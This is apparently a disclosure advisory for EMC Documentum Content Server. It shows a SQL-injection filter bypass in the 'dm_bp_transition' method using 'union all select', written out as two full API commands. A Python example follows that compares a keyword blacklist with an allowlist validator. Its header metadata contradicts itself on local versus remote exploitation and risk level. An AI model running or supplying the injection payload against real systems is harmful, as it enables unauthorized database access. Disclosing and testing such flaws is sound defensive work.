EMC Documentum Content Server Code Execution

2015.08.19
Risk: Medium
Local: Yes
Remote: No
CWE: N/A


CVSS Base Score: 9/10
Impact Subscore: 10/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Product: EMC Documentum Content Server
Vendor: EMC
Version: ANY
CVE: N/A
Risk: High
Status: public/not fixed

For detailed description see http://seclists.org/bugtraq/2015/Jul/51

New behavior introduced in CVE-2015-4532:

API> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS=' repo repo dmadmin "" 0000000000000000 0000000000000000 0000000000000000 "0801fd08805c9dfe,'' union select r_object_id from dm_sysobject where r_object_id=''0801fd08805c9dfe" 0000000000000000 0000000000000000 0000000000000000 "" 0 0 T F T T dmadmin 0000000000000000'

[DM_METHOD_E_METHOD_ARGS_INVALID]error: "The arguments being passed to the method 'dm_bp_transition' are invalid: arguments contain sql keywords which are not allowed."

New attack vector (note ALL keyword):

API> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS=' repo repo dmadmin "" 0000000000000000 0000000000000000 0000000000000000 "0801fd08805c9dfe,'' union all select r_object_id from dm_sysobject where r_object_id=''0801fd08805c9dfe" 0000000000000000 0000000000000000 0000000000000000 "" 0 0 T F T T dmadmin 0000000000000000'

__
Regards,
Andrey B. Panfilov

References:

http://seclists.org/bugtraq/2015/Jul/51
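
The error message and the ALL variant quoted in the advisory point at a keyword-based argument filter. The following is an added example, not EMC's code and not the advisory author's: it assumes a hypothetical phrase blacklist and assumes the quoted argument should carry only 16-hex-character object IDs, then runs both argument strings from the advisory through that blacklist and through an allowlist check.

```python
import re

# Hypothetical phrase blacklist (assumption: the server's real filter is not on the page).
BLOCKED_PHRASES = ("union select", "insert into", "delete from", "drop table")

# Assumption: this argument should hold only object IDs, 16 hex characters each,
# like 0801fd08805c9dfe in the advisory.
OBJECT_ID = re.compile(r"[0-9a-fA-F]{16}")

# The two argument strings quoted in the advisory.
REJECTED_AFTER_FIX = ("0801fd08805c9dfe,'' union select r_object_id from "
                      "dm_sysobject where r_object_id=''0801fd08805c9dfe")
ALL_VARIANT = ("0801fd08805c9dfe,'' union all select r_object_id from "
               "dm_sysobject where r_object_id=''0801fd08805c9dfe")


def blacklist_accepts(argument: str) -> bool:
    """Reject only when a blocked phrase appears (case and spacing normalized)."""
    normalized = " ".join(argument.lower().split())
    return not any(phrase in normalized for phrase in BLOCKED_PHRASES)


def allowlist_accepts(argument: str) -> bool:
    """Accept only a comma-separated list of well-formed object IDs."""
    return all(OBJECT_ID.fullmatch(part) for part in argument.split(","))


def compare(argument: str) -> dict:
    """Return both verdicts so the gap between the two checks is visible."""
    return {"blacklist": blacklist_accepts(argument),
            "allowlist": allowlist_accepts(argument)}


if __name__ == "__main__":
    for label, arg in (("union select", REJECTED_AFTER_FIX),
                       ("union all select", ALL_VARIANT),
                       ("plain object id", "0801fd08805c9dfe")):
        print(f"{label:18} {compare(arg)}")
```

Format validation of this kind complements binding the values as parameters in the query that consumes them; it does not replace it.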

